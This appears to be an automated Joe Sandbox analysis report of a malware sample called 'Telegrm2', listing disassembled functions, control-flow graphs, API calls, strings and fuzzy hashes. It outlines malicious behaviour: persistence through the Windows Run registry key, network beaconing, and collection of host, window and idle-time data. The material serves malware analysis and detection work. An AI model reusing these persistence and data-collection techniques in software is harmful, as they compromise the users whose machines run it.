                                            control_flow_graph 598 30a1e80-30a1ead 599 30a219d-30a21ba 598->599 600 30a1eb3-30a1ebe 598->600 601 30a1ec0 600->601 602 30a1ec3-30a1eca 601->602 602->599 603 30a1ed0-30a1ee3 SleepEx 602->603 603->602 604 30a1ee5-30a1ef1 GetCurrentThreadId 603->604 605 30a1f1c-30a1f2e 604->605 606 30a1ef3 604->606 608 30a1f30-30a1f33 605->608 609 30a1f35-30a1f38 605->609 607 30a1f00-30a1f0e 606->607 607->607 610 30a1f10-30a1f16 607->610 611 30a1f3b-30a1f41 608->611 609->611 610->605 612 30a1fbd-30a1fd0 611->612 613 30a1f43-30a1f7d call 30c2478 VirtualAlloc 611->613 614 30a1fd2-30a1fd5 612->614 615 30a1fd7-30a1fda 612->615 621 30a1f7f-30a1f82 613->621 622 30a1f84-30a1f87 613->622 617 30a1fdd-30a1fe3 614->617 615->617 619 30a205f-30a207e 617->619 620 30a1fe5-30a201f call 30c2478 VirtualAlloc 617->620 624 30a2080-30a2083 619->624 625 30a2085-30a2088 619->625 633 30a2021-30a2024 620->633 634 30a2026-30a2029 620->634 623 30a1f89-30a1f9d call 30b2c40 621->623 622->623 637 30a1f9f-30a1fa7 VirtualFree 623->637 638 30a1fad-30a1fb9 623->638 628 30a208b-30a2090 624->628 625->628 631 30a210c-30a2142 628->631 632 30a2092-30a20cc call 30c2478 VirtualAlloc 628->632 635 30a2149-30a214d 631->635 636 30a2144-30a2147 631->636 646 30a20ce-30a20d1 632->646 647 30a20d3-30a20d6 632->647 640 30a202b-30a203f call 30b2c40 633->640 634->640 642 30a2151-30a216e call 30a2900 call 30a1370 635->642 636->642 637->638 638->612 648 30a204f-30a205b 640->648 649 30a2041-30a2049 VirtualFree 640->649 654 30a2173-30a217f GetCurrentThreadId 642->654 651 30a20d8-30a20ec call 30b2c40 646->651 647->651 648->619 649->648 656 30a20ee-30a20f6 VirtualFree 651->656 657 30a20fc-30a2108 651->657 658 30a2190-30a2197 654->658 659 30a2181-30a2187 654->659 656->657 657->631 658->599 658->601 659->658 660 30a2189 659->660 660->658
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree$CurrentThread$Sleep
                                            • String ID:
                                            • API String ID: 2090942847-0
                                            • Opcode ID: 19684a6e57f34190d6087524b5c43d20b184ee03852d5742e64a789b41b5f1b3
                                            • Instruction ID: aac5fae892b45da3c5a81470dbd331a0d9a36704c5a352bf9d7c2df7923ff6bd
                                            • Opcode Fuzzy Hash: 19684a6e57f34190d6087524b5c43d20b184ee03852d5742e64a789b41b5f1b3
                                            • Instruction Fuzzy Hash: 18919E32306B80ABD75DDB6AE25079977A9F745B84F048629DB4697B10DF38E0B2C740
                                            Function 030A21C0 Relevance: 13.6, APIs: 9, Instructions: 97networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 661 30a21c0-30a222b call 30b31b0 call 30b2c40 666 30a233c-30a234f 661->666 667 30a2231-30a223b 661->667 669 30a2359-30a2374 call 30b2c00 666->669 670 30a2351-30a2354 call 30b3288 666->670 668 30a2240-30a225e select 667->668 672 30a2260-30a2262 668->672 673 30a22d6-30a22dd 668->673 670->669 676 30a22c7-30a22ce 672->676 677 30a2264-30a227c recv 672->677 678 30a22df-30a22e3 673->678 679 30a2334 673->679 676->668 680 30a22d4 676->680 681 30a22b9-30a22c2 call 30a2380 677->681 682 30a227e 677->682 683 30a22e8-30a232c setsockopt CancelIo closesocket SetEvent 678->683 679->666 680->679 681->676 685 30a2280-30a2288 call 30b3200 682->685 686 30a22a1-30a22a8 682->686 683->679 685->676 690 30a228a-30a2295 call 30b3200 685->690 686->679 687 30a22ae-30a22b7 686->687 687->683 690->676 693 30a2297-30a229f call 30b3200 690->693 693->676 693->686
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$CancelEventclosesocketrecvselectsetsockopt
                                            • String ID:
                                            • API String ID: 2233327707-0
                                            • Opcode ID: c6a6a255043a8cba69db4ab556270d85fcbe37a0a1dc9e023cf4b47ee1e52c14
                                            • Instruction ID: adcc17a897ca29d28a166338bd186dfd228a04f7782b4ff5849553db91e17ebb
                                            • Opcode Fuzzy Hash: c6a6a255043a8cba69db4ab556270d85fcbe37a0a1dc9e023cf4b47ee1e52c14
                                            • Instruction Fuzzy Hash: 7841CF32206A8081E7A0DFB9F4543AE77A8F786B94F584635DB994BB98CF38C444CB04
                                            Function 02DB0020 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 457memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL ref: 02DB011F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID: @$XVXT
                                            • API String ID: 2167126740-4063696373
                                            • Opcode ID: 6b8ca969d0edacce73b4e7c308406ec1214b92f2b93040ed9f05acbd5687362f
                                            • Instruction ID: 062b72277a207c95cbbf46023bbeae29253b52a56603192d47f761ef6fa34a3e
                                            • Opcode Fuzzy Hash: 6b8ca969d0edacce73b4e7c308406ec1214b92f2b93040ed9f05acbd5687362f
                                            • Instruction Fuzzy Hash: D6D17C30618A098FCB19DF58D894AFAB7E1FF59346F14416DE48BC7252DA30E846CB80
                                            Function 030AFCF0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 292fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNELBASE ref: 030B004E
                                            • WriteFile.KERNELBASE ref: 030B0102
                                            • FindCloseChangeNotification.KERNELBASE ref: 030B011A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: File$ChangeCloseCreateFindNotificationWrite
                                            • String ID: GET
                                            • API String ID: 3805958096-1805413626
                                            • Opcode ID: 746ffc48c353acf727c1d7119f86ed89f1ebfaa118ae15d2ea546b41010038fd
                                            • Instruction ID: 0eb66e3692a466371c67163de65a071b5ec4fc6ce28ef5644c583c1dc9b3a86e
                                            • Opcode Fuzzy Hash: 746ffc48c353acf727c1d7119f86ed89f1ebfaa118ae15d2ea546b41010038fd
                                            • Instruction Fuzzy Hash: 16C1CE36226B4182E724EF29F85479E77B4F786B98F405A14CF9A0BB94CF79C194C384
                                            Function 02DB0091 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 296memorylibrarynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AllocateLoadMemoryVirtual
                                            • String ID: @
                                            • API String ID: 582251630-2766056989
                                            • Opcode ID: c2f7a8c889b9dcb2227e988a3cb537535b5236b3493b5ac8ebfb49acde9b56f0
                                            • Instruction ID: 213cb35bca897fcf74ec1b0a44f712fe59d64d1a9eeb2dcc046740518d704988
                                            • Opcode Fuzzy Hash: c2f7a8c889b9dcb2227e988a3cb537535b5236b3493b5ac8ebfb49acde9b56f0
                                            • Instruction Fuzzy Hash: EB916F30618A09CFCB1ADF58D8A8ABAB7A1FF59346F55416DE48BC7352DB30D846CB40
                                            Function 030B83F4 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Heap$CreateInformationVersion
                                            • String ID:
                                            • API String ID: 3563531100-0
                                            • Opcode ID: 9ef408723e01272be0652c1ccd660a47e6133f0586bb4a4d1fd94ecd904275c3
                                            • Instruction ID: b96bb11c75f79ff8f63753228549f8e9e12dcc73d3d9bd0fa20b61f0382b584b
                                            • Opcode Fuzzy Hash: 9ef408723e01272be0652c1ccd660a47e6133f0586bb4a4d1fd94ecd904275c3
                                            • Instruction Fuzzy Hash: 3AE0D874623AD083FBC69B24EC597A5236CFB88345F849518E90B02764DF3CC2468704
                                            Function 030A1BF0 Relevance: 19.7, APIs: 13, Instructions: 152networktimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: setsockopt$EventIoctlResetTimeconnectgethostbynamegetsocknamehtonsinet_ntopsockettime
                                            • String ID:
                                            • API String ID: 4102826399-0
                                            • Opcode ID: 69823b34bc752394f411954f9e383b6d2b1dd5977c59d891b4d8328fbe2701bc
                                            • Instruction ID: ea9de31703285ab6a664731d320472666302f79a3946cf741c3450b5d24f262a
                                            • Opcode Fuzzy Hash: 69823b34bc752394f411954f9e383b6d2b1dd5977c59d891b4d8328fbe2701bc
                                            • Instruction Fuzzy Hash: F9617972711B419AE725CFA5E41039D33B5F788798F004226EF8957BA8DF78C269C744
                                            Function 030A4430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Message$ClassCreateDispatchHandleModuleRegisterTranslateWindow
                                            • String ID: QjNy1jwRYuH6aNtMf3Jz
                                            • API String ID: 3848795541-3621823610
                                            • Opcode ID: 3406c9ca98162bfd763306c4c3a91e589ec25171c65301aba56c24f70cb98ac9
                                            • Instruction ID: 33c02c3ecdba0cf8e55fa712da80818cc90fe21f93c157025ce38ddb41a9d215
                                            • Opcode Fuzzy Hash: 3406c9ca98162bfd763306c4c3a91e589ec25171c65301aba56c24f70cb98ac9
                                            • Instruction Fuzzy Hash: 8E216036615B8182EB60CB65F86479E73A8F784714F949316E6AD43AA4DF7CC209CB04
                                            Function 030B0682 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 223registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 696 30b0682-30b068c 697 30b0698-30b06df call 30ad560 call 30afcf0 696->697 698 30b0693 call 30b0b40 696->698 703 30b06e1-30b06e4 697->703 704 30b06e6 697->704 698->697 705 30b06e9-30b06ed 703->705 704->705 706 30b06ef-30b06fa 705->706 707 30b0721-30b0725 705->707 708 30b0708-30b071a 706->708 709 30b06fc-30b0703 call 30b2c20 706->709 710 30b0759-30b075d 707->710 711 30b0727-30b0732 707->711 708->707 709->708 715 30b075f-30b076a 710->715 716 30b0791-30b0795 710->716 713 30b0740-30b0752 711->713 714 30b0734-30b073b call 30b2c20 711->714 713->710 714->713 718 30b0778-30b078a 715->718 719 30b076c-30b0773 call 30b2c20 715->719 720 30b07ad-30b07b0 716->720 721 30b0797-30b079f 716->721 718->716 719->718 722 30b099d-30b09ab call 30b3288 720->722 723 30b07b6-30b07cc call 30b38a4 call 30b4238 720->723 721->720 725 30b07a1-30b07a8 call 30b2c20 721->725 732 30b09ad-30b09b1 call 30b2c20 722->732 733 30b09b6-30b09ce 722->733 740 30b07d1-30b07fb call 30b4250 723->740 725->720 732->733 736 30b09dc-30b09fa 733->736 737 30b09d0-30b09d7 call 30b2c20 733->737 738 30b09fc-30b0a00 call 30b2c20 736->738 739 30b0a05-30b0a1d 736->739 737->736 738->739 743 30b0a2b-30b0af7 739->743 744 30b0a1f-30b0a26 call 30b2c20 739->744 751 30b07fd-30b084b call 30b0b40 call 30b0fe0 call 30b10a0 740->751 749 30b0af9-30b0afd call 30b2c20 743->749 750 30b0b02-30b0b33 call 30b2c00 743->750 744->743 749->750 761 30b08ab-30b08b3 751->761 762 30b084d-30b0852 751->762 765 30b08c1-30b08e2 761->765 766 30b08b5-30b08bc call 30b2c20 761->766 763 30b085d-30b0872 762->763 764 30b0854-30b0858 call 30b2c20 762->764 768 30b0889-30b0890 763->768 769 30b0874-30b0887 call 30b2c40 763->769 764->763 771 30b08f0-30b0911 765->771 772 30b08e4-30b08eb call 30b2c20 765->772 766->765 775 30b0893-30b08a7 768->775 769->775 773 30b091f-30b0948 RegOpenKeyExA 771->773 774 30b0913-30b091a call 30b2c20 771->774 772->771 773->722 779 30b094a-30b0981 RegSetValueExA 773->779 774->773 775->761 781 30b0983-30b0986 779->781 782 30b0992-30b0997 RegCloseKey 779->782 783 30b098d call 30b22c0 781->783 782->722 783->782
                                            APIs
                                            Strings
                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 030B0932
                                            • run, xrefs: 030B0986
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CloseOpenValuerand
                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$run
                                            • API String ID: 1269030272-4096352211
                                            • Opcode ID: 0eb5e466a62fb442526ae9acbbd83eacc3eadb4b7a869fa09193532aa9ce17dd
                                            • Instruction ID: c2be973c3b034d71d5a54122decbac5df18163d224b9c45d9945baf5103cf4cc
                                            • Opcode Fuzzy Hash: 0eb5e466a62fb442526ae9acbbd83eacc3eadb4b7a869fa09193532aa9ce17dd
                                            • Instruction Fuzzy Hash: D6A15836212BC089E7B5EF35E8443DA3375F78539CF444A16DAAA4BA99CF75C284C340
                                            Function 030B30BC Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                            • String ID:
                                            • API String ID: 3283625137-0
                                            • Opcode ID: 6e130da0ff8c3ab2adc921a66f0e9e408a67b2e7e51e5be27d9b103f46d0179d
                                            • Instruction ID: fc28934a8d6f43f9a5f484d239b5d7eff08709ff5fd426222668f1529859d8fb
                                            • Opcode Fuzzy Hash: 6e130da0ff8c3ab2adc921a66f0e9e408a67b2e7e51e5be27d9b103f46d0179d
                                            • Instruction Fuzzy Hash: 3D21C33930678086EB14EBA6E9503DEB3B8FB84BE0F584665DFA907B94CF38C1518704
                                            Function 030AEB40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B23A0: GetComputerNameA.KERNEL32 ref: 030B23FF
                                              • Part of subcall function 030B23A0: lstrcpy.KERNEL32 ref: 030B2415
                                              • Part of subcall function 030B23A0: wsprintfA.USER32 ref: 030B2444
                                            • SleepEx.KERNEL32 ref: 030AEB75
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ComputerNameSleeplstrcpywsprintf
                                            • String ID: driver$run
                                            • API String ID: 2401651887-4270002515
                                            • Opcode ID: 20af55a0a792ddad8a0b3d662374fb4cfecfde6feee429567d2bc022b4671d35
                                            • Instruction ID: d8759dee2c5fbe0f24eb78632cde8a39a0d70fcfc1ad99a9a9119b1f4b9ec6d5
                                            • Opcode Fuzzy Hash: 20af55a0a792ddad8a0b3d662374fb4cfecfde6feee429567d2bc022b4671d35
                                            • Instruction Fuzzy Hash: FEF0FC20233B41C1EB51D7B9FCA43AE27D8E791744F481665C98F86AE4FB28C246C750
                                            Function 030A3080 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • Process32First.KERNEL32 ref: 030A30A0
                                            • FindCloseChangeNotification.KERNELBASE ref: 030A3144
                                              • Part of subcall function 030B34EC: _errno.LIBCMT ref: 030B34FE
                                              • Part of subcall function 030B34EC: _invalid_parameter_noinfo.LIBCMT ref: 030B3509
                                            • Process32Next.KERNEL32 ref: 030A311E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Process32$ChangeCloseFindFirstNextNotification_errno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1362859326-0
                                            • Opcode ID: 9e16f7d71bb666a0a3024ac22c452917e7419aeba9a2986a714468f2fb20f4db
                                            • Instruction ID: a816b654dc100c5f95616c8328ee1d33f347705be5600f12ebaec5e30cdd6b2c
                                            • Opcode Fuzzy Hash: 9e16f7d71bb666a0a3024ac22c452917e7419aeba9a2986a714468f2fb20f4db
                                            • Instruction Fuzzy Hash: 36115B3A315B9082DB11CB66B8107ABF7A8F789FE4F584652EE9943B98CF78C144C704
                                            Function 030AED81 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B3290: malloc.LIBCMT ref: 030B32AA
                                            • GetLastInputInfo.USER32 ref: 030AEDCA
                                            • GetTickCount.KERNEL32 ref: 030AEDD0
                                            • GetForegroundWindow.USER32 ref: 030AEDFE
                                              • Part of subcall function 030A2F20: IsWindow.USER32 ref: 030A2F37
                                              • Part of subcall function 030A2F20: GetWindowThreadProcessId.USER32 ref: 030A2F63
                                              • Part of subcall function 030A2F20: GetCurrentProcessId.KERNEL32 ref: 030A2F6B
                                              • Part of subcall function 030A2F20: GetCurrentThreadId.KERNEL32 ref: 030A2F77
                                              • Part of subcall function 030A2F20: GetWindowTextA.USER32 ref: 030A2F8D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Window$CurrentProcessThread$CountForegroundInfoInputLastTextTickmalloc
                                            • String ID:
                                            • API String ID: 3323085477-0
                                            • Opcode ID: 5763157703a87b543d0bd3730e45da23fe047bd02d410b9fc023e7ad3a4ea20b
                                            • Instruction ID: ca64c22c45f2fc31206590402e00c816f7d00fb7cc306b25989a7ea0d8d56f8d
                                            • Opcode Fuzzy Hash: 5763157703a87b543d0bd3730e45da23fe047bd02d410b9fc023e7ad3a4ea20b
                                            • Instruction Fuzzy Hash: 4C11212222678086CB45EF7AF84439D66A0E7C5B80F08D525DB8A8BB48EF7CC584C700
                                            Function 030AE907 Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B3290: malloc.LIBCMT ref: 030B32AA
                                            • GetLastInputInfo.USER32 ref: 030AEDCA
                                            • GetTickCount.KERNEL32 ref: 030AEDD0
                                            • GetForegroundWindow.USER32 ref: 030AEDFE
                                              • Part of subcall function 030A2F20: IsWindow.USER32 ref: 030A2F37
                                              • Part of subcall function 030A2F20: GetWindowThreadProcessId.USER32 ref: 030A2F63
                                              • Part of subcall function 030A2F20: GetCurrentProcessId.KERNEL32 ref: 030A2F6B
                                              • Part of subcall function 030A2F20: GetCurrentThreadId.KERNEL32 ref: 030A2F77
                                              • Part of subcall function 030A2F20: GetWindowTextA.USER32 ref: 030A2F8D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Window$CurrentProcessThread$CountForegroundInfoInputLastTextTickmalloc
                                            • String ID:
                                            • API String ID: 3323085477-0
                                            • Opcode ID: b0e024c62c537539580f0e06b511da9b86c61474c153675eab6ca3acdb076f4d
                                            • Instruction ID: fd6aff2d9ab97cbd262cec71c97dfeff2f086e341ed01073c618a646c484f9cf
                                            • Opcode Fuzzy Hash: b0e024c62c537539580f0e06b511da9b86c61474c153675eab6ca3acdb076f4d
                                            • Instruction Fuzzy Hash: 7911C626722B8086DB45DFBAF84439DA3A5E7C4B80F089524EF4A4BB58DF78C594CB40
                                            Function 030A2900 Relevance: 3.1, APIs: 2, Instructions: 65networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 15db26ce0b318c216a0a286f3bd2225c8393db57c311448df21e445c578b8900
                                            • Instruction ID: 287d00c0e95a9991624aaa98ef649e09cea16af333f433acd8e90734075e5c54
                                            • Opcode Fuzzy Hash: 15db26ce0b318c216a0a286f3bd2225c8393db57c311448df21e445c578b8900
                                            • Instruction Fuzzy Hash: 93112C32709E8141D330DB5ABC40779B698FB89FD0F581635DE5847F95EA78C0839300
                                            Function 030A3430 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentHwProfileA.ADVAPI32 ref: 030A346F
                                            • GetComputerNameA.KERNEL32 ref: 030A34C5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ComputerCurrentNameProfile
                                            • String ID:
                                            • API String ID: 3082751485-0
                                            • Opcode ID: 7439476aeacf4fcd84d34c824d060710b32c4a088b627d30dac2738648bc36bd
                                            • Instruction ID: 21037bef241ec3c357e1d4d1263adaaeab8e379bd0c53260aa7e6b813ff17aa3
                                            • Opcode Fuzzy Hash: 7439476aeacf4fcd84d34c824d060710b32c4a088b627d30dac2738648bc36bd
                                            • Instruction Fuzzy Hash: 21217C26219BC086DB70CF28E45039FB7A2F784764F405316DAAD47A98DB3DC109CB11
                                            Function 030B2FEC Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B48D4: GetLastError.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B48DE
                                              • Part of subcall function 030B48D4: FlsGetValue.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B48EC
                                              • Part of subcall function 030B48D4: FlsSetValue.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B4918
                                              • Part of subcall function 030B48D4: GetCurrentThreadId.KERNEL32 ref: 030B492C
                                              • Part of subcall function 030B48D4: SetLastError.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B4944
                                            • RtlExitUserThread.NTDLL(?,?,?,030B302E,?,?,?,?,030B30BB), ref: 030B3008
                                            • _getptd.LIBCMT ref: 030B3014
                                              • Part of subcall function 030B4AB0: FlsGetValue.KERNEL32(?,?,00000000,030B3006,?,?,?,030B302E,?,?,?,?,030B30BB), ref: 030B4AC9
                                              • Part of subcall function 030B4AB0: FlsSetValue.KERNEL32(?,?,00000000,030B3006,?,?,?,030B302E,?,?,?,?,030B30BB), ref: 030B4ADA
                                              • Part of subcall function 030B4AB0: _freefls.LIBCMT ref: 030B4AE3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Value$ErrorLastThread$CurrentExitUser_freefls_getptd
                                            • String ID:
                                            • API String ID: 1633623398-0
                                            • Opcode ID: 6eca5d2f76a370d93ba34be570b30444f0ab442f75bb455c1c6ac8df694790f7
                                            • Instruction ID: 9defda6a6145e149507d6f9fa026464082719124d4a72fac983f0f3ad6b43a90
                                            • Opcode Fuzzy Hash: 6eca5d2f76a370d93ba34be570b30444f0ab442f75bb455c1c6ac8df694790f7
